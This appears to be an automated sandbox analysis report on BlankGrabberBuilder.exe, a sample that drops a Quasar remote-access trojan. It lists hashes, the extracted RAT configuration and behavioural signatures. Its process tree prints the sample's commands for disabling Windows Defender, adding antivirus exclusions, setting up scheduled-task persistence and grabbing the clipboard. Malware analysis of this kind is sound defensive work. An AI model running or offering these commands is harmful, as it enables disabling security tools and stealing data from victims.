Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-12-2024 02:23
Behavioral task
behavioral1
Sample
BlankGrabberBuilder.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
BlankGrabberBuilder.exe
Resource
win10v2004-20241007-en
General
-
Target
BlankGrabberBuilder.exe
-
Size
7.1MB
-
MD5
41f73d46b40f8a48fba2da1cbe8ce0e5
-
SHA1
81792f8f896e965a8c11a7ab4f5e130acd099d2c
-
SHA256
832538e38de96f15359b7fcfc4a74e5e64a1e6c255a9a4cdd1451ab080c19ca8
-
SHA512
f52332894c5ca533d109d158822e4af4b0447e84fe99747c2e7b9700692f656d77677598054ec368518ff45a4d3b0384585a9ce815bb375be76a685b7298aede
-
SSDEEP
196608:KiumWQ4Zv1hhzOjmFwDRxtYSHdK34kdai7bN3m2L+BWT:2zv1hoK2pM9B3Qi4i
Malware Config
Extracted
quasar
1.4.1
Beamed Kid
192.168.56.1:4782
7596ffa8-81d2-4d4c-91ce-4a1fac3d8ad2
-
encryption_key
5B70B4279F1A0F275FCC61552D78BAAA381E9AC6
-
install_name
Quasar.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
System
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x000b000000023b5c-87.dat family_quasar behavioral2/memory/1456-99-0x0000000000AE0000-0x0000000000E30000-memory.dmp family_quasar -
pid Process 4764 powershell.exe 3252 powershell.exe 4148 powershell.exe 1324 powershell.exe 4304 powershell.exe 1484 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts BlankGrabberBuilder.exe -
A potential corporate email address has been identified in the URL: 6633dd5dcff475e6fb744426_&@2x.png
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4796 powershell.exe 5052 cmd.exe -
Executes dropped EXE 3 IoCs
pid Process 1456 bound.exe 404 Quasar.exe 2688 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe 3608 BlankGrabberBuilder.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 27 discord.com 28 discord.com 78 discord.com 79 discord.com 80 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com 25 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4592 tasklist.exe 656 tasklist.exe 432 tasklist.exe 4196 tasklist.exe 3704 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023b6e-22.dat upx behavioral2/memory/3608-26-0x00007FF80B490000-0x00007FF80B8F6000-memory.dmp upx behavioral2/files/0x000a000000023b60-29.dat upx behavioral2/files/0x000a000000023b6c-30.dat upx behavioral2/files/0x000a000000023b62-45.dat upx behavioral2/files/0x000a000000023b67-50.dat upx behavioral2/files/0x000a000000023b66-49.dat upx behavioral2/files/0x000a000000023b65-48.dat upx behavioral2/files/0x000a000000023b64-47.dat upx behavioral2/files/0x000a000000023b63-46.dat upx behavioral2/files/0x000a000000023b61-44.dat upx behavioral2/files/0x000a000000023b5f-43.dat upx behavioral2/files/0x0031000000023b73-42.dat upx behavioral2/files/0x000a000000023b72-41.dat upx behavioral2/files/0x000a000000023b71-40.dat upx behavioral2/files/0x000a000000023b6d-37.dat upx behavioral2/files/0x000a000000023b6b-36.dat upx behavioral2/memory/3608-35-0x00007FF814A60000-0x00007FF814A6F000-memory.dmp upx behavioral2/memory/3608-31-0x00007FF80C210000-0x00007FF80C234000-memory.dmp upx behavioral2/memory/3608-56-0x00007FF80C0F0000-0x00007FF80C11C000-memory.dmp upx behavioral2/memory/3608-58-0x00007FF813000000-0x00007FF813018000-memory.dmp upx behavioral2/memory/3608-60-0x00007FF810C50000-0x00007FF810C6F000-memory.dmp upx behavioral2/memory/3608-62-0x00007FF80B310000-0x00007FF80B48A000-memory.dmp upx behavioral2/memory/3608-64-0x00007FF80F3A0000-0x00007FF80F3B9000-memory.dmp upx behavioral2/memory/3608-68-0x00007FF80F370000-0x00007FF80F39E000-memory.dmp upx behavioral2/memory/3608-66-0x00007FF814080000-0x00007FF81408D000-memory.dmp upx behavioral2/memory/3608-73-0x00007FF80BC90000-0x00007FF80BD48000-memory.dmp upx behavioral2/memory/3608-76-0x00007FF80C210000-0x00007FF80C234000-memory.dmp upx behavioral2/memory/3608-75-0x00007FFFFC4C0000-0x00007FFFFC839000-memory.dmp upx behavioral2/memory/3608-78-0x00007FF80F350000-0x00007FF80F365000-memory.dmp upx behavioral2/memory/3608-81-0x00007FF80F340000-0x00007FF80F34D000-memory.dmp upx behavioral2/memory/3608-80-0x00007FF80C0F0000-0x00007FF80C11C000-memory.dmp upx behavioral2/memory/3608-72-0x00007FF80B490000-0x00007FF80B8F6000-memory.dmp upx behavioral2/memory/3608-85-0x00007FF80BA00000-0x00007FF80BB18000-memory.dmp upx behavioral2/memory/3608-84-0x00007FF813000000-0x00007FF813018000-memory.dmp upx behavioral2/memory/3608-118-0x00007FF810C50000-0x00007FF810C6F000-memory.dmp upx behavioral2/memory/3608-132-0x00007FF80B310000-0x00007FF80B48A000-memory.dmp upx behavioral2/memory/3608-187-0x00007FF80F3A0000-0x00007FF80F3B9000-memory.dmp upx behavioral2/memory/3608-289-0x00007FF80F370000-0x00007FF80F39E000-memory.dmp upx behavioral2/memory/3608-291-0x00007FF80BC90000-0x00007FF80BD48000-memory.dmp upx behavioral2/memory/3608-303-0x00007FFFFC4C0000-0x00007FFFFC839000-memory.dmp upx behavioral2/memory/3608-325-0x00007FF80C210000-0x00007FF80C234000-memory.dmp upx behavioral2/memory/3608-329-0x00007FF810C50000-0x00007FF810C6F000-memory.dmp upx behavioral2/memory/3608-324-0x00007FF80B490000-0x00007FF80B8F6000-memory.dmp upx behavioral2/memory/3608-330-0x00007FF80B310000-0x00007FF80B48A000-memory.dmp upx behavioral2/memory/3608-476-0x00007FF80B490000-0x00007FF80B8F6000-memory.dmp upx behavioral2/memory/3608-494-0x00007FF80C0F0000-0x00007FF80C11C000-memory.dmp upx behavioral2/memory/3608-514-0x00007FF80F350000-0x00007FF80F365000-memory.dmp upx behavioral2/memory/3608-516-0x00007FF80BA00000-0x00007FF80BB18000-memory.dmp upx behavioral2/memory/3608-515-0x00007FF80F340000-0x00007FF80F34D000-memory.dmp upx behavioral2/memory/3608-513-0x00007FF80BC90000-0x00007FF80BD48000-memory.dmp upx behavioral2/memory/3608-512-0x00007FF80F370000-0x00007FF80F39E000-memory.dmp upx behavioral2/memory/3608-511-0x00007FF814080000-0x00007FF81408D000-memory.dmp upx behavioral2/memory/3608-510-0x00007FF80F3A0000-0x00007FF80F3B9000-memory.dmp upx behavioral2/memory/3608-509-0x00007FF80B310000-0x00007FF80B48A000-memory.dmp upx behavioral2/memory/3608-508-0x00007FF810C50000-0x00007FF810C6F000-memory.dmp upx behavioral2/memory/3608-507-0x00007FF813000000-0x00007FF813018000-memory.dmp upx behavioral2/memory/3608-506-0x00007FFFFC4C0000-0x00007FFFFC839000-memory.dmp upx behavioral2/memory/3608-493-0x00007FF814A60000-0x00007FF814A6F000-memory.dmp upx behavioral2/memory/3608-492-0x00007FF80C210000-0x00007FF80C234000-memory.dmp upx behavioral2/memory/3608-491-0x00007FF80B490000-0x00007FF80B8F6000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Crashpad\metadata setup.exe File opened for modification C:\Program Files\Crashpad\settings.dat setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2688 cmd.exe 4828 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4140 WMIC.exe 2180 WMIC.exe 3004 WMIC.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 440 systeminfo.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133787894950798905" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4548 schtasks.exe 4956 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 4764 powershell.exe 1484 powershell.exe 1324 powershell.exe 4764 powershell.exe 1484 powershell.exe 1324 powershell.exe 4304 powershell.exe 4304 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 3344 powershell.exe 3344 powershell.exe 3344 powershell.exe 3252 powershell.exe 3252 powershell.exe 3848 powershell.exe 3848 powershell.exe 4148 powershell.exe 4148 powershell.exe 3588 powershell.exe 3588 powershell.exe 4912 chrome.exe 4912 chrome.exe 3560 chrome.exe 3560 chrome.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 404 Quasar.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 4196 tasklist.exe Token: SeIncreaseQuotaPrivilege 2276 WMIC.exe Token: SeSecurityPrivilege 2276 WMIC.exe Token: SeTakeOwnershipPrivilege 2276 WMIC.exe Token: SeLoadDriverPrivilege 2276 WMIC.exe Token: SeSystemProfilePrivilege 2276 WMIC.exe Token: SeSystemtimePrivilege 2276 WMIC.exe Token: SeProfSingleProcessPrivilege 2276 WMIC.exe Token: SeIncBasePriorityPrivilege 2276 WMIC.exe Token: SeCreatePagefilePrivilege 2276 WMIC.exe Token: SeBackupPrivilege 2276 WMIC.exe Token: SeRestorePrivilege 2276 WMIC.exe Token: SeShutdownPrivilege 2276 WMIC.exe Token: SeDebugPrivilege 2276 WMIC.exe Token: SeSystemEnvironmentPrivilege 2276 WMIC.exe Token: SeRemoteShutdownPrivilege 2276 WMIC.exe Token: SeUndockPrivilege 2276 WMIC.exe Token: SeManageVolumePrivilege 2276 WMIC.exe Token: 33 2276 WMIC.exe Token: 34 2276 WMIC.exe Token: 35 2276 WMIC.exe Token: 36 2276 WMIC.exe Token: SeDebugPrivilege 1456 bound.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeIncreaseQuotaPrivilege 2276 WMIC.exe Token: SeSecurityPrivilege 2276 WMIC.exe Token: SeTakeOwnershipPrivilege 2276 WMIC.exe Token: SeLoadDriverPrivilege 2276 WMIC.exe Token: SeSystemProfilePrivilege 2276 WMIC.exe Token: SeSystemtimePrivilege 2276 WMIC.exe Token: SeProfSingleProcessPrivilege 2276 WMIC.exe Token: SeIncBasePriorityPrivilege 2276 WMIC.exe Token: SeCreatePagefilePrivilege 2276 WMIC.exe Token: SeBackupPrivilege 2276 WMIC.exe Token: SeRestorePrivilege 2276 WMIC.exe Token: SeShutdownPrivilege 2276 WMIC.exe Token: SeDebugPrivilege 2276 WMIC.exe Token: SeSystemEnvironmentPrivilege 2276 WMIC.exe Token: SeRemoteShutdownPrivilege 2276 WMIC.exe Token: SeUndockPrivilege 2276 WMIC.exe Token: SeManageVolumePrivilege 2276 WMIC.exe Token: 33 2276 WMIC.exe Token: 34 2276 WMIC.exe Token: 35 2276 WMIC.exe Token: 36 2276 WMIC.exe Token: SeDebugPrivilege 404 Quasar.exe Token: SeIncreaseQuotaPrivilege 4140 WMIC.exe Token: SeSecurityPrivilege 4140 WMIC.exe Token: SeTakeOwnershipPrivilege 4140 WMIC.exe Token: SeLoadDriverPrivilege 4140 WMIC.exe Token: SeSystemProfilePrivilege 4140 WMIC.exe Token: SeSystemtimePrivilege 4140 WMIC.exe Token: SeProfSingleProcessPrivilege 4140 WMIC.exe Token: SeIncBasePriorityPrivilege 4140 WMIC.exe Token: SeCreatePagefilePrivilege 4140 WMIC.exe Token: SeBackupPrivilege 4140 WMIC.exe Token: SeRestorePrivilege 4140 WMIC.exe Token: SeShutdownPrivilege 4140 WMIC.exe Token: SeDebugPrivilege 4140 WMIC.exe Token: SeSystemEnvironmentPrivilege 4140 WMIC.exe Token: SeRemoteShutdownPrivilege 4140 WMIC.exe Token: SeUndockPrivilege 4140 WMIC.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
pid Process 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe 3560 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 404 Quasar.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3852 wrote to memory of 3608 3852 BlankGrabberBuilder.exe 82 PID 3852 wrote to memory of 3608 3852 BlankGrabberBuilder.exe 82 PID 3608 wrote to memory of 3372 3608 BlankGrabberBuilder.exe 83 PID 3608 wrote to memory of 3372 3608 BlankGrabberBuilder.exe 83 PID 3608 wrote to memory of 4912 3608 BlankGrabberBuilder.exe 84 PID 3608 wrote to memory of 4912 3608 BlankGrabberBuilder.exe 84 PID 3608 wrote to memory of 3688 3608 BlankGrabberBuilder.exe 144 PID 3608 wrote to memory of 3688 3608 BlankGrabberBuilder.exe 144 PID 3608 wrote to memory of 4756 3608 BlankGrabberBuilder.exe 175 PID 3608 wrote to memory of 4756 3608 BlankGrabberBuilder.exe 175 PID 3608 wrote to memory of 2608 3608 BlankGrabberBuilder.exe 91 PID 3608 wrote to memory of 2608 3608 BlankGrabberBuilder.exe 91 PID 3608 wrote to memory of 100 3608 BlankGrabberBuilder.exe 93 PID 3608 wrote to memory of 100 3608 BlankGrabberBuilder.exe 93 PID 3372 wrote to memory of 1484 3372 cmd.exe 94 PID 3372 wrote to memory of 1484 3372 cmd.exe 94 PID 4912 wrote to memory of 4764 4912 cmd.exe 96 PID 4912 wrote to memory of 4764 4912 cmd.exe 96 PID 4756 wrote to memory of 1456 4756 cmd.exe 97 PID 4756 wrote to memory of 1456 4756 cmd.exe 97 PID 2608 wrote to memory of 4196 2608 cmd.exe 98 PID 2608 wrote to memory of 4196 2608 cmd.exe 98 PID 3688 wrote to memory of 1324 3688 cmd.exe 99 PID 3688 wrote to memory of 1324 3688 cmd.exe 99 PID 100 wrote to memory of 2276 100 cmd.exe 100 PID 100 wrote to memory of 2276 100 cmd.exe 100 PID 1456 wrote to memory of 4548 1456 bound.exe 102 PID 1456 wrote to memory of 4548 1456 bound.exe 102 PID 1456 wrote to memory of 404 1456 bound.exe 104 PID 1456 wrote to memory of 404 1456 bound.exe 104 PID 3608 wrote to memory of 1652 3608 BlankGrabberBuilder.exe 105 PID 3608 wrote to memory of 1652 3608 BlankGrabberBuilder.exe 105 PID 1652 wrote to memory of 656 1652 cmd.exe 152 PID 1652 wrote to memory of 656 1652 cmd.exe 152 PID 3608 wrote to memory of 428 3608 BlankGrabberBuilder.exe 108 PID 3608 wrote to memory of 428 3608 BlankGrabberBuilder.exe 108 PID 428 wrote to memory of 3032 428 cmd.exe 110 PID 428 wrote to memory of 3032 428 cmd.exe 110 PID 3608 wrote to memory of 3504 3608 BlankGrabberBuilder.exe 111 PID 3608 wrote to memory of 3504 3608 BlankGrabberBuilder.exe 111 PID 3504 wrote to memory of 4140 3504 cmd.exe 113 PID 3504 wrote to memory of 4140 3504 cmd.exe 113 PID 3608 wrote to memory of 4880 3608 BlankGrabberBuilder.exe 114 PID 3608 wrote to memory of 4880 3608 BlankGrabberBuilder.exe 114 PID 4880 wrote to memory of 2180 4880 cmd.exe 116 PID 4880 wrote to memory of 2180 4880 cmd.exe 116 PID 404 wrote to memory of 4956 404 Quasar.exe 160 PID 404 wrote to memory of 4956 404 Quasar.exe 160 PID 3608 wrote to memory of 1888 3608 BlankGrabberBuilder.exe 119 PID 3608 wrote to memory of 1888 3608 BlankGrabberBuilder.exe 119 PID 1888 wrote to memory of 4304 1888 cmd.exe 121 PID 1888 wrote to memory of 4304 1888 cmd.exe 121 PID 3608 wrote to memory of 4148 3608 BlankGrabberBuilder.exe 204 PID 3608 wrote to memory of 4148 3608 BlankGrabberBuilder.exe 204 PID 3608 wrote to memory of 3216 3608 BlankGrabberBuilder.exe 123 PID 3608 wrote to memory of 3216 3608 BlankGrabberBuilder.exe 123 PID 3608 wrote to memory of 4600 3608 BlankGrabberBuilder.exe 126 PID 3608 wrote to memory of 4600 3608 BlankGrabberBuilder.exe 126 PID 3608 wrote to memory of 5052 3608 BlankGrabberBuilder.exe 127 PID 3608 wrote to memory of 5052 3608 BlankGrabberBuilder.exe 127 PID 3608 wrote to memory of 2704 3608 BlankGrabberBuilder.exe 129 PID 3608 wrote to memory of 2704 3608 BlankGrabberBuilder.exe 129 PID 3608 wrote to memory of 4756 3608 BlankGrabberBuilder.exe 175 PID 3608 wrote to memory of 4756 3608 BlankGrabberBuilder.exe 175 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5104 attrib.exe 3236 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BlankGrabberBuilder.exe"C:\Users\Admin\AppData\Local\Temp\BlankGrabberBuilder.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\BlankGrabberBuilder.exe"C:\Users\Admin\AppData\Local\Temp\BlankGrabberBuilder.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BlankGrabberBuilder.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BlankGrabberBuilder.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Quasar.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4548
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Quasar.exe"C:\Users\Admin\AppData\Roaming\SubDir\Quasar.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Quasar.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4956
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4148
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3216
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:4600
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2704
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:656
-
-
-
